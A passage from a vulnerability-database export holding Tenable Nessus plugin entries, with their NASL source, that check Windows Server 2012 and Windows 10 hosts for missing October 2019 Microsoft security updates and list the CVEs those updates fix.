The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129723);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/12/13\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1339\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1346\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1365\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520007\");\n script_xref(name:\"MSKB\", value:\"4519985\");\n script_xref(name:\"MSFT\", value:\"MS19-4520007\");\n script_xref(name:\"MSFT\", value:\"MS19-4519985\");\n\n script_name(english:\"KB4519985: Windows Server 2012 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4519985\nor cumulative update 4520007. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. 
An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. 
An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. 
An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. 
(CVE-2019-1343,\n CVE-2019-1346)\");\n # https://support.microsoft.com/en-us/help/4520007/windows-server-2012-update-kb4520007\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7d72b58b\");\n # https://support.microsoft.com/en-us/help/4519985/windows-server-2012-update-kb4519985\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e7951661\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4519985 or Cumulative Update KB4520007.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520007', '4519985');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520007, 4519985])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:19:59", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4520010.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. 
(CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non-Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the user's system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. 
(CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). 
An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. 
The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520010.NASL", "href": "https://www.tenable.com/plugins/nessus/129725", "published": "2019-10-08T00:00:00", "title": "KB4520010: Windows 10 Version 1703 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129725);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/15\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1230\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1321\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1339\",\n \"CVE-2019-1340\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1345\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520010\");\n script_xref(name:\"MSFT\", value:\"MS19-4520010\");\n\n script_name(english:\"KB4520010: Windows 10 Version 1703 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing 
security update 4520010.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. 
(CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). 
An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. 
The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\");\n # https://support.microsoft.com/en-us/help/4520010/windows-10-update-kb4520010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f0552f5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4520010.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520010');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520010])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:19:58", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4517389.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. 
An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. 
(CVE-2019-1323,\n CVE-2019-1336)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non-Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. 
An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the user's system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. 